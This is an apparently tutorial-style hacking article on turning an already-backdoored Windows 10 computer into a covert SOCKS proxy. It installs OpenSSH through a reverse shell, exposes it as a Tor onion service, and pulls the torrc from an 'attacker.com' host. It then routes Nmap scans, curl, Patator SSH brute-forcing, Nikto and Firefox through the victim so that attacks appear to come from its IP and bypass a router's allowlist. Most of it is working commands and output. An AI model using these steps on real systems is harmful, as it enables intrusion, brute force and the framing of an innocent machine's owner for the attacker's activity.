A hacker with privileged access to a Windows 10 computer can configure it to act as a web proxy, allowing the attacker to probe and attack devices and services on the network through the compromised computer. The scans and attacks appear to come from the Windows 10 computer, making it difficult to determine the attacker's actual location.
The attack uses an OpenSSH server and Tor. Newer versions of Windows 10 may already have an SSH server installed, which makes it even easier for an attacker to abuse the service.
While Tor is used in my example, other tools like ngrok and Serveo might serve as substitutes. However, these services were not tested, mainly because Tor connections are encrypted and private, which makes the transmission of sensitive information more secure.
Why would someone do this to my computer?
It's unbelievable what a black hat can do with a compromised Windows 10 computer.
In home networks, hackers can use the computer as a web proxy for fraudulent credit card transactions, denial-of-service attacks, or downloading pirated content. The illegal activity appears to come from your Windows 10 device and poses a major legal risk to you.
The technique also has benefits for white hat penetration testers. For example, it is usually difficult to run tools such as Nikto, Nmap, Patator, curl, and theHarvester directly on the compromised device. With a proxy, these tools can be run through the Windows 10 device, which provides many opportunities to pivot to other devices without ever connecting directly to the target network.
Attack Scenario Requirements
A few things are needed for this particular method.
- Remote Access: This article assumes that some level of remote access (i.e., a backdoor) has already been established. Remote access can be achieved with MouseJack keystroke injection, a USB Rubber Ducky payload, physical backdoor devices, USB dead-drop attacks, and other social engineering methods.
- Administrator privileges: If OpenSSH is not installed, administrator rights (i.e., root privileges) are required to install and set it up on the Windows 10 target. This requirement is largely conditional, because some recent versions of Windows 10 already have an SSH server installed and running.
- Account password: The user's account password is required to log in to the SSH server after setup. If the shell was acquired with elevated privileges but without knowing the user's password, the password hashes could be dumped and cracked offline. Alternatively, it may be possible to create a new user remotely, or to configure the OpenSSH server to allow logins without a password. However, these methods are untested and beyond the scope of this article. For now, the password of the already compromised Windows 10 account is required.
In this guide, code blocks beginning with > are commands run in PowerShell on the Windows 10 system (i.e., through the Netcat backdoor). Code blocks beginning with ~$ are commands run on the Kali Linux system.
Is OpenSSH already installed and running?
This attack requires an SSH server. The SSH server is distinct from the SSH client that ships with most recent versions of Windows 10. If OpenSSH is already installed, most of the following steps can be performed without administrator privileges. If it is not installed, administrator rights are required to install it.
Below are some commands that can be used to determine if OpenSSH is already installed and running in the background.
First, check whether the OpenSSH directory exists. If it doesn't, SSH is probably not installed.
> ls "C:\Program Files\OpenSSH\"
The Get-NetTCPConnection cmdlet can be used to quickly list which ports are in the Listen state. Here we can see port 22, the default SSH port, listening on this computer.
> Get-NetTCPConnection -State Listen

LocalAddress LocalPort RemoteAddress RemotePort State  AppliedSetting
------------ --------- ------------- ---------- -----  --------------
::           49676     ::            0          Listen
::           7680      ::            0          Listen
::           445       ::            0          Listen
::           135       ::            0          Listen
::           22        ::            0          Listen
0.0.0.0      49676     0.0.0.0       0          Listen
0.0.0.0      5040      0.0.0.0       0          Listen
0.0.0.0      135       0.0.0.0       0          Listen
0.0.0.0      22        0.0.0.0       0          Listen
The default port number of any service can be changed to an arbitrary value, so this output is not 100% conclusive.
With netstat, the process using a specific port can be identified. However, the netstat command took much longer to return than Get-NetTCPConnection; in some cases it took a few minutes before the output reached the Kali system. Get-NetTCPConnection can also be combined with Get-Process to show which process owns a port, but this seemed like a good opportunity to show both options.
> netstat -ba

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:22             DESKTOP-U4E0WK3:0      LISTENING
 [sshd.exe]
  TCP    0.0.0.0:135            DESKTOP-U4E0WK3:0      LISTENING
  RpcSs
 [svchost.exe]
  TCP    0.0.0.0:445            DESKTOP-U4E0WK3:0      LISTENING
 Can not obtain ownership information
  TCP    0.0.0.0:5040           DESKTOP-U4E0WK3:0      LISTENING
  CDPSvc
 [svchost.exe]
  TCP    0.0.0.0:7680           DESKTOP-U4E0WK3:0      LISTENING
  DoSvc
 [svchost.exe]
In the output above we can clearly see that sshd.exe is bound to port 22.
Finally, Get-Process lists the processes running in the background, sorted alphabetically. Scroll to the S section and look for a process named sshd.
> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    297      19     6760      24328       0.27   6104   1 ApplicationFrameHost
    397      23    18056      50384       3.94   3784   0 aswEngSrv
    701      24    19592      38364      12.05   3104   0 aswidsagent
   4115      83    69404      40016      24.70   2336   0 AvastSvc
   1888      44    22444      35008       4.30   1876   1 AvastUI
...
    430      25     5924      15460       0.25   2628   0 spoolsv
     98      11     1728       6664       0.05   7388   0 sshd
    252      10     2524       7904       0.48    488   0 svchost
    156       9     1852       7860       0.13    520   0 svchost
     79       5     1040       3912       0.03    908   0 svchost
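The three checks above can be folded into one function that also reports the sshd service's state and startup type, which tells you whether the server would survive a reboot. This is an added example, not code from the original article; it runs as a normal user, needs Get-NetTCPConnection (Windows 8 / Server 2012 or later), and assumes the default install directory used in this article.

```powershell
# Added example (not from the original article): combine the directory, listener, owning-process
# and service checks into a single pass. No administrator rights are needed.
function Test-OpenSSHServer {
    param(
        # Assumption: the path this article unpacks OpenSSH into. Change it if installed elsewhere.
        [string]$InstallDir = 'C:\Program Files\OpenSSH',
        # sshd's default port. An admin can move it, so the listener check is indicative only.
        [int]$Port = 22
    )

    # The service is registered as "sshd" both by the Windows optional feature and by the
    # GitHub Win32-OpenSSH build installed with install-sshd.ps1.
    $svc = Get-Service -Name sshd -ErrorAction SilentlyContinue

    # Any TCP listener on the port, IPv4 or IPv6, and the process that owns each one.
    # Without -ErrorAction SilentlyContinue the cmdlet complains when nothing matches.
    $listeners = Get-NetTCPConnection -State Listen -LocalPort $Port -ErrorAction SilentlyContinue
    $owners = foreach ($l in $listeners) {
        $p = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
        if ($p) { "$($p.ProcessName) (PID $($p.Id))" } else { "PID $($l.OwningProcess)" }
    }

    [PSCustomObject]@{
        InstallDirExists = Test-Path -LiteralPath $InstallDir
        ServiceFound     = [bool]$svc
        ServiceStatus    = if ($svc) { $svc.Status.ToString() } else { 'n/a' }
        StartupType      = if ($svc) { $svc.StartType.ToString() } else { 'n/a' }
        PortListening    = ($listeners | Measure-Object).Count -gt 0
        ListenerOwner    = ($owners | Sort-Object -Unique) -join ', '
        SshdProcess      = [bool](Get-Process -Name sshd -ErrorAction SilentlyContinue)
    }
}

Test-OpenSSHServer | Format-List
```

If ServiceFound is true but ServiceStatus is Stopped, the server only needs net start sshd (Step 1) and no download; a StartupType of Manual or Disabled means it will not come back after a reboot unless the startup type is changed.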
If SSH is not found on the target system, an elevated (administrator) backdoor is required to run many of the following commands. If SSH is already running, skip ahead to Step 2.
Step 1: Setting Up SSH on the Windows 10 Target Computer
All of the following commands were executed through a reverse shell, which can be set up with a Netcat listener. Compromising a Windows 10 system to this extent has been covered in previous articles.
In my tests, the SecurityProtocol had to be set to TLS 1.2 with the following command before Invoke-WebRequest (iwr) could download the OpenSSH binaries.
> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Download the OpenSSH-Win64.zip file from the Win32-OpenSSH releases page on GitHub, substituting the current release tag for <release-tag> in the URL below. This download can take a minute or two, depending on the network speed of the Windows 10 system. During this time the Netcat terminal will not respond or display a progress bar. Be patient here.

> iwr https://github.com/PowerShell/Win32-OpenSSH/releases/download/<release-tag>/OpenSSH-Win64.zip -o $env:TEMP\OpenSSH-Win64.zip

2. Extracting the OpenSSH Archive
PowerShell 5.0 and later include a convenient decompression cmdlet called Expand-Archive, which can quickly unpack the OpenSSH-Win64.zip file from the target's temporary directory.
> Expand-Archive -Path "$env:TEMP\OpenSSH-Win64.zip" -DestinationPath 'C:\Program Files\OpenSSH' -Force
Expand-Archive takes the input file (-Path $env:TEMP\OpenSSH-Win64.zip) and unpacks it into (-DestinationPath) a new folder named C:\Program Files\OpenSSH.
Install the SSH server using the provided install-sshd.ps1 script. If no errors occur, the terminal reports a successful installation after a few seconds. In one test an error ("NoServiceFoundForGivenName") was reported, but it did not seem to cause the installation to fail.
> & "C:\Program Files\OpenSSH\OpenSSH-Win64\install-sshd.ps1"

[SC] SetServiceObjectSecurity SUCCESS
[SC] ChangeServiceConfig2 SUCCESS
[SC] ChangeServiceConfig2 SUCCESS
sshd and ssh-agent services successfully installed
After the installation, the SSH server does not start by itself, and it will not start automatically when the system is rebooted either (its startup type is Manual; Set-Service -Name sshd -StartupType Automatic changes that). The following net command is required to start the SSH server.
> net start sshd

The OpenSSH SSH Server service is starting.
The OpenSSH SSH Server service was started successfully.
Use Get-NetTCPConnection or Get-Process to verify that the SSH server is running. Note that port 22 is now in the Listen state.
> Get-NetTCPConnection -State Listen

LocalAddress LocalPort RemoteAddress RemotePort State  AppliedSetting
------------ --------- ------------- ---------- -----  --------------
::           49676     ::            0          Listen
::           7680      ::            0          Listen
::           445       ::            0          Listen
::           135       ::            0          Listen
::           22        ::            0          Listen
0.0.0.0      49676     0.0.0.0       0          Listen
0.0.0.0      5040      0.0.0.0       0          Listen
0.0.0.0      135       0.0.0.0       0          Listen
0.0.0.0      22        0.0.0.0       0          Listen
Step 2: Setting up Tor on the Windows 10 target computer
Once the OpenSSH server is running, Tor can be set up.
First, download the ZIP file containing the precompiled Tor binaries and DLLs. At the time of writing, tor-win32-0.3.5.8.zip is the latest stable version; in the future, check the Tor Project website for newer versions. Use the "Windows Expert Bundle" URL, not the tar.gz source archive.
> iwr 'https://www.torproject.org/dist/torbrowser/8.0.9/tor-win32-0.3.5.8.zip' -o $env:TEMP\tor.zip
2. Extracting the Tor Archive
With Expand-Archive, the ZIP file can again be unpacked into the temporary directory (-DestinationPath).
> Expand-Archive -Path $env:TEMP\tor.zip -DestinationPath $env:TEMP\tor
Then change (cd) into the new Tor directory.
> cd $env:TEMP\tor\Tor
Use the ls command to list the contents of the directory.
> ls

    Directory: C:\Users\USERNAME\AppData\Local\Temp\tor\Tor

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/21/2019   3:31 PM        2585371 libeay32.dll
-a----        2/21/2019   3:31 PM         860748 libevent-2-1-6.dll
-a----        2/21/2019   3:31 PM         601445 libevent_core-2-1-6.dll
-a----        2/21/2019   3:31 PM         562811 libevent_extra-2-1-6.dll
-a----        2/21/2019   3:31 PM         991228 libgcc_s_sjlj-1.dll
-a----        2/21/2019   3:31 PM         278533 libssp-0.dll
-a----        2/21/2019   3:31 PM         511930 libwinpthread-1.dll
-a----        2/21/2019   3:31 PM         788352 ssleay32.dll
-a----        2/21/2019   3:31 PM        1007104 tor-gencert.exe
-a----        2/21/2019   3:31 PM        3794944 tor.exe
-a----        2/21/2019   3:31 PM         107520 zlib1.dll
3. Create the torrc Configuration File
Note that there is no torrc file in the ls output. torrc is the configuration file that tells Tor how to behave. In this case we want Tor to create a new onion service. Anyone who has previously set up a Tor onion service will recognize the HiddenServiceDir and HiddenServicePort options in the torrc file. They specify the directory where Tor stores the onion service's keys and hostname, and the local port the onion service forwards to.
There were some annoying word-wrapping errors in my tests when the torrc file was created with echo and other PowerShell cmdlets for creating files. In the end, it was easier to host the desired torrc file on a remote server and simply download it with PowerShell.
First, verify the target's username using the $env variable in PowerShell. This username is required for the torrc configuration file below.
> echo $env:USERNAME

tokyoneon
Now create a file named torrc on Kali or on a virtual private server and save the configuration below to it. Alternatively, this file can be hosted on a file-sharing service or on GitHub.
HiddenServiceDir C:\Users\USERNAME\AppData\Local\Temp\tor\Tor\HS
HiddenServicePort 22 127.0.0.1:22

4. Download the torrc from the Attacker System
To serve the torrc file, start a simple Python 3 web server on the attacker's system so that the file is reachable from the network or the internet.
~$ python3 -m http.server 80
On Windows 10, Invoke-WebRequest can be reused to download the torrc configuration file from the attacker's system.
> iwr http://attacker.com/torrc -o torrc
Now use ls to verify that the torrc file was saved correctly.
> ls

    Directory: C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/21/2019   3:31 PM        2585371 libeay32.dll
-a----        2/21/2019   3:31 PM         860748 libevent-2-1-6.dll
-a----        2/21/2019   3:31 PM         601445 libevent_core-2-1-6.dll
-a----        2/21/2019   3:31 PM         562811 libevent_extra-2-1-6.dll
-a----        2/21/2019   3:31 PM         991228 libgcc_s_sjlj-1.dll
-a----        2/21/2019   3:31 PM         278533 libssp-0.dll
-a----        2/21/2019   3:31 PM         511930 libwinpthread-1.dll
-a----        2/21/2019   3:31 PM         788352 ssleay32.dll
-a----        2/21/2019   3:31 PM        1007104 tor-gencert.exe
-a----        2/21/2019   3:31 PM        3794944 tor.exe
-a----         5/7/2019   9:03 PM             99 torrc
-a----        2/21/2019   3:31 PM         107520 zlib1.dll
Then use cat to read the file contents.
> cat torrc

HiddenServiceDir C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\HS
HiddenServicePort 22 127.0.0.1:22

5. Start the Tor Process

Finally, start tor.exe with the following command. After running it, wait for the Netcat terminal to display "Bootstrapped 100%: Done", which indicates that Tor started correctly. Press Enter to return to an interactive Netcat shell.
> Start-Process -NoNewWindow -FilePath .\tor.exe -ArgumentList '-f', 'torrc'

PS C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor> May 08 10:43:43.090 [notice] Tor 0.3.5.8 (git-5030edfb534245ed) running on Windows 8 [or later] with Libevent 2.1.8-stable, OpenSSL 1.0.2q, Zlib 1.2.11, Liblzma N/A, and Libzstd N/A.
May 08 10:43:43.152 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
May 08 10:43:43.699 [notice] Read configuration file "C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\torrc".
May 08 10:43:43.715 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\<default>. Is this what you wanted?
May 08 10:43:43.715 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\tokyoneon\AppData\Local\Temp\tor\Tor\<default>. Is this what you wanted?
May 08 10:43:43.762 [notice] Opening Socks listener on 127.0.0.1:9050
May 08 10:43:43.762 [notice] Opened Socks listener on 127.0.0.1:9050
May 08 10:43:43.000 [notice] Bootstrapped 0%: Starting
May 08 10:43:43.000 [notice] Starting with guard context "default"
May 08 10:43:45.000 [notice] Bootstrapped 5%: Connecting to directory server
May 08 10:43:45.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
May 08 10:43:48.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
May 08 10:43:49.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
May 08 10:43:50.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
May 08 10:43:56.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
May 08 10:43:57.000 [notice] Bootstrapped 40%: Loading authority key certs
May 08 10:44:00.000 [notice] The current consensus has no exit nodes. Tor can only build internal paths, such as paths to onion services.
May 08 10:44:00.000 [notice] Bootstrapped 45%: Asking for relay descriptors for internal paths
May 08 10:44:00.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/6680, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of end bw (no exits in consensus, using mid) = 0% of path bw.)
May 08 10:44:04.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/6680, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of end bw (no exits in consensus, using mid) = 0% of path bw.)
May 08 10:44:05.000 [notice] Bootstrapped 50%: Loading relay descriptors for internal paths
May 08 10:44:06.000 [notice] The current consensus contains exit nodes. Tor can build exit and internal paths.
May 08 10:44:13.000 [notice] Bootstrapped 56%: Loading relay descriptors
May 08 10:44:15.000 [notice] Bootstrapped 64%: Loading relay descriptors
May 08 10:44:16.000 [notice] Bootstrapped 70%: Loading relay descriptors
May 08 10:44:18.000 [notice] Bootstrapped 76%: Loading relay descriptors
May 08 10:44:18.000 [notice] Bootstrapped 80%: Connecting to the Tor network
May 08 10:44:19.000 [notice] Bootstrapped 85%: Finishing handshake with first hop
May 08 10:44:23.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
May 08 10:44:28.000 [notice] Bootstrapped 100%: Done
After Tor starts, a new directory called HS is created. It contains the hostname file with the onion address. Use cat to view its contents.
> cat HS\hostname

w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion
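Steps 3 to 5 can also be done entirely on the target, without hosting the torrc on an attacker server. The following is an added example, not code from the original article. Its explanation of the word-wrapping trouble is my assumption: a long one-liner typed into a reverse shell is wrapped by the console, and in Windows PowerShell 5.1 the > redirection and Out-File write UTF-16 with a BOM, which tor does not read as a config file. Writing the lines with Set-Content -Encoding Ascii avoids both. It assumes the directory layout used above (tor.exe and its DLLs already unpacked under $env:TEMP\tor\Tor) and needs no administrator rights.

```powershell
# Added example (not from the original article): write torrc locally, start tor with -f,
# and wait for the onion hostname instead of guessing when bootstrap has finished.
$TorDir = Join-Path $env:TEMP 'tor\Tor'   # assumption: the article's unpack location
$HsDir  = Join-Path $TorDir 'HS'
$Torrc  = Join-Path $TorDir 'torrc'
$Log    = Join-Path $TorDir 'tor.log'

# HiddenServiceDir is built from the real profile path, so no username has to be hand-edited.
# Tor creates the directory and the onion service keys on first start.
$lines = @(
    "HiddenServiceDir $HsDir",
    'HiddenServicePort 22 127.0.0.1:22'
)
# One array element per line, ASCII, no BOM: the form tor expects.
Set-Content -LiteralPath $Torrc -Value $lines -Encoding Ascii

# Start tor detached from the shell. Notices go to tor.log so the "Bootstrapped 100%: Done"
# line can still be checked later with Select-String.
$tor = Start-Process -FilePath (Join-Path $TorDir 'tor.exe') `
    -ArgumentList @('-f', "`"$Torrc`"") -WorkingDirectory $TorDir `
    -WindowStyle Hidden -RedirectStandardOutput $Log -PassThru

# The hostname file appears once tor has generated the service keys. Poll for it, and bail
# out if tor died early (typically a bad torrc) or nothing shows up within $TimeoutSec.
$HostFile   = Join-Path $HsDir 'hostname'
$TimeoutSec = 120
$sw = [System.Diagnostics.Stopwatch]::StartNew()
while (-not (Test-Path -LiteralPath $HostFile)) {
    if ($tor.HasExited) {
        throw "tor.exe exited with code $($tor.ExitCode); see $Log"
    }
    if ($sw.Elapsed.TotalSeconds -gt $TimeoutSec) {
        throw "no hostname after $TimeoutSec s; see $Log"
    }
    Start-Sleep -Seconds 2
}
"Onion service: $(Get-Content -LiteralPath $HostFile) (tor PID $($tor.Id))"
```

The hostname is written before the circuit is fully built, so before connecting from Kali check that tor.log contains "Bootstrapped 100%: Done" (Select-String -Path $Log -Pattern 'Bootstrapped 100%'). Because the service only forwards to 127.0.0.1:22, no firewall rule on the Windows host is needed.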
Step 3: Connecting to the OpenSSH Server via Tor
Back in Kali Linux, Tor must be installed on the Kali system to interact with the new onion service.

1. Installing Tor in Kali Linux
Tor can be installed in Kali with apt-get install -y tor, but it is better to install it from the Tor Project's own repository. This was covered in a recent Null Byte article on hiding SSH services from Shodan; refer to it for detailed installation instructions.
Before we start proxying hacking tools through Windows 10, we need to make sure the SSH server is reachable from the Kali system. The torsocks command should be included with the Tor package. If not, install it with the following command.
~$ apt-get install torsocks

Reading package lists... Done
Building dependency tree
Reading state information... Done
torsocks is already the newest version (2.3.0-2).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Then use torsocks with ssh to connect to the SSH server running on the Windows 10 target, using the username and onion address found above.
~$ torsocks ssh -v -p22 tokyoneon@w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion
It may take several attempts, and up to 60 seconds each, for a connection to be made. This slowness is common with new onion services and with SSH over Tor. If the SSH connection succeeds, everything is working as expected. Type exit or press Ctrl+D to end the SSH session.
3. Enable the Proxy Option
Open a new terminal and use the following command to create a SOCKS proxy on local port 1337 with ssh's -D (dynamic port forwarding) option; OpenSSH serves both SOCKS4 and SOCKS5 on it. The port number is arbitrary and can be changed to any free port below 65536.
~$ torsocks ssh -D1337 -C -p22 tokyoneon@w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion

Microsoft Windows [Version 10.0.17134.706]
(c) 2018 Microsoft Corporation. All rights reserved.

tokyoneon@DESKTOP-U4E0WK3 C:\Users\tokyoneon>
This new SSH terminal is not meant to be interacted with. As long as it stays open, the proxy remains available. In Kali, verify that the proxy port is open with the ss command, which lists listening sockets. Note port 1337 bound to 127.0.0.1; hacking tools and web browsers can be configured to send their requests through it and out of the hacked Windows 10 computer.
~$ ss -tpl

State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port
LISTEN  0       128     127.0.0.1:1337      0.0.0.0:*         users:(("ssh",pid=5798,fd=4))
Step 4: Configure the hacking tools to use the proxy
Many tools can be configured to use this proxy. Proxychains is a good example: with proxychains, many command-line tools can be pushed through the SSH connection even if they have no proxy support of their own.
1. Install Proxychains
Make sure proxychains is installed in Kali Linux with the following command.
~$ apt-get install proxychains
By default, proxychains is configured to anonymize requests through Tor on port 9050, so the configuration file needs to be changed.
Use nano to open proxychains.conf. Change the very last line of the file from "socks4 127.0.0.1 9050" to "socks5 127.0.0.1 1337" and exit nano.
~$ nano /etc/proxychains.conf

2. Proxy Nmap Scans
Many users will want to run Nmap scans through the Windows 10 computer once the SOCKS5 proxy is up. Note that Nmap's built-in proxy support is limited, and not every scan type goes through proxychains either: proxychains only intercepts ordinary TCP connect() calls, so a SYN scan (-sS), which sends raw packets, bypasses the proxy entirely. The scan below shows this: the MAC addresses and sub-millisecond latencies in its output can only come from Kali's own network interface. For a scan that really goes through the proxy, use a TCP connect scan with host discovery and DNS resolution disabled (-sT -Pn -n), and expect it to be much slower.
~$ proxychains nmap -p80,22,21,443,8080,8443 -sS -T5 192.168.1.1/24

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-08 19:25 UTC
Nmap scan report for 192.168.1.183
Host is up (0.00093s latency).
PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
80/tcp   filtered http
443/tcp  filtered https
8080/tcp filtered http-proxy
MAC Address: 16:BE:3F:F6:E1:22 (Hewlett Packard)

Nmap scan report for 192.168.1.225
Host is up (0.0023s latency).
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
80/tcp   closed http
443/tcp  closed https
8080/tcp open   http-proxy
MAC Address: 74:B3:4C:D2:33:A2 (Sony)

Nmap scan report for 192.168.1.1
Host is up (0.000044s latency).
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   open   http
443/tcp  closed https
8080/tcp closed http-proxy

Nmap done: 256 IP addresses (3 hosts up) scanned in 8.39 seconds
3. Proxy Curl Commands
curl is a powerful command-line tool for making all kinds of web requests, and it supports many protocols and features. It is useful for enumerating the web servers running on devices in the network. Unlike many other tools, curl has built-in SOCKS5 support, enabled with the --proxy option. With socks5:// the hostname is resolved on Kali; use socks5h:// instead when names should be resolved on the far side of the proxy, i.e., by the Windows 10 computer.
~$ curl --proxy socks5://127.0.0.1:1337 -I "http://192.168.1.225"

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.6.8
Date: Thu, 09 May 2019 21:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1387
curl through proxychains also works as expected.

~$ proxychains curl http://192.168.1.225:8080

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
Directory listing for /
...
On the server side, the request is seen coming from 192.168.1.183, the IP address of the Windows 10 device, not from the Kali system, which could be on another network anywhere in the world.
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.1.183 - - [09/May/2019 21:51:51] "HEAD / HTTP/1.1" 200 -
192.168.1.183 - - [09/May/2019 21:51:58] "GET / HTTP/1.1" 200 -
4. Proxy Patator Brute-Force Attacks
Patator is a command-line brute-force tool. With proxychains, Patator can brute-force services through the Windows 10 computer. Although untested, the same approach should work with other brute-forcing tools such as Hydra and Medusa.
~$ proxychains patator ssh_login host=192.168.1.225 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1

ProxyChains-3.1 (http://proxychains.sf.net)
INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-05-08 20:51 UTC
INFO -
INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1     22     5.921 | 123456                             |     1 | Authentication failed.
INFO - 1     22     5.496 | Abcdef123                          |     2 | Authentication failed.
INFO - 1     22     5.619 | a123456                            |     3 | Authentication failed.
INFO - 1     22     5.532 | little123                          |     4 | Authentication failed.
INFO - 1     22     5.640 | nanda334                           |     5 | Authentication failed.
INFO - 0     30     2.583 | tokyoneon                          |     6 | SSH-2.0-OpenSSH_7.9p1 Debian-5
INFO - 1     22     5.723 | abc12345                           |     7 | Authentication failed.
INFO - 1     22     5.501 | Password                           |     8 | Authentication failed.
INFO - 1     22     5.567 | Pawerjon123                        |     9 | Authentication failed.
The server side shows the failed password guesses arriving from the Windows 10 IP address (192.168.1.183). This is further confirmation that attacks originating from the Kali system are properly routed through the Windows 10 computer.
sshd: Failed password for root from 192.168.1.183 port 50148 ssh2
sshd: error: maximum authentication attempts exceeded for root from 192.168.1.183 port 50148 ssh2 [preauth]
sshd: Disconnecting authenticating user root 192.168.1.183 port 50148: Too many authentication failures [preauth]
sshd: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183 user=root
sshd: PAM service(sshd) ignoring max retries; 6 > 3
sshd: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183 user=root
sshd: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd: Failed password for root from 192.168.1.183 port 50149 ssh2
sshd: error: maximum authentication attempts exceeded for root from 192.168.1.183 port 50149 ssh2 [preauth]
sshd: Disconnecting authenticating user root 192.168.1.183 port 50149: Too many authentication failures [preauth]
sshd: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183 user=root
sshd: PAM service(sshd) ignoring max retries; 6 > 3
sshd: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183 user=root
sshd: Failed password for root from 192.168.1.183 port 50150 ssh2
sshd: Accepted password for root from 192.168.1.183 port 50150 ssh2
5. Proxy theHarvester Searches

theHarvester is an information-gathering tool for penetration testers in the early stages of red team engagements. It can perform virtual host verification, DNS enumeration, reverse domain searches, and IP lookups, and it can query Shodan.
~$ proxychains theharvester -d nmap.org -l 200 -b bing,censys,yahoo

ProxyChains-3.1 (http://proxychains.sf.net)
*******************************************************************
*  theHarvester Ver. 3.0.6                                        *
*  Coded by Christian Martorella                                  *
*  Edge-Security Research                                         *
*******************************************************************

found supported engines
[-] Starting harvesting process for domain: nmap.org
[-] Searching in Censys:
[-] Searching in Bing:
        Searching 50 results...
        Searching 100 results...
        Searching 150 results...
        Searching 200 results...
[-] Searching in Yahoo..
        Searching 0 results...
        Searching 10 results...
        Searching 190 results...
        Searching 200 results...

Harvesting results
No IP addresses found

[+] Emails found:
------------------
firstname.lastname@example.org
email@example.com
firstname.lastname@example.org

[+] Hosts found in search engines:
------------------------------------
Total hosts: 6

[-] Resolving hostnames IPs...
issues.nmap.org:18.104.22.168
research.nmap.org:22.214.171.124
scanme.nmap.org:126.96.36.199
svn.nmap.org:188.8.131.52
www.nmap.org:184.108.40.206
6. Proxy Nikto Scans

Nikto is a simple web server scanner that examines a website and reports discovered weaknesses that can later be used to compromise the site.
While Nikto has built-in support for HTTP proxies, it can't use this SOCKS5 proxy directly, so proxychains is used instead. I didn't test many of Nikto's options and arguments, but simple scans seemed to function properly. Readers are encouraged to experiment with this one before using it in a real scenario.
~$ proxychains nikto -host 192.168.1.225 -port 8080 -nossl

ProxyChains-3.1 (http://proxychains.sf.net)
- Nikto v2.1.6
---------------------------------------------------------------------------
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
+ Target IP:          192.168.1.225
+ Target Hostname:    192.168.1.225
+ Target Port:        8080
+ Start Time:         2019-05-08 19:33:26 (GMT0)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/3.6.8
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
...
7. Proxy Web Requests with Firefox
Security-focused web services and routers can define blacklist and whitelist rules based on MAC and IP addresses. For example, this particular router only allows the Windows 10 computer to access its web interface. Attempts to reach 192.168.1.1 from any other device on the network are refused with an error page.
Now, it would be possible to spoof Kali's MAC and IP address to trick the router into letting us view the gateway. But it's also possible to use the SSH proxy to achieve the same goal.
Open Firefox in Kali, enter about:preferences in the URL bar, and in the "General" tab click the "Settings" button under Network Settings. Select "Manual proxy configuration", set the SOCKS Host to 127.0.0.1 and the port to 1337, and choose "SOCKS v5". Also tick "Proxy DNS when using SOCKS v5" so that name lookups are made through the Windows 10 computer as well, instead of leaking from Kali. Then click "OK."
Now, navigating to 192.168.1.1 to access the router is allowed because the router believes the requests are coming from the whitelisted Windows 10 device.
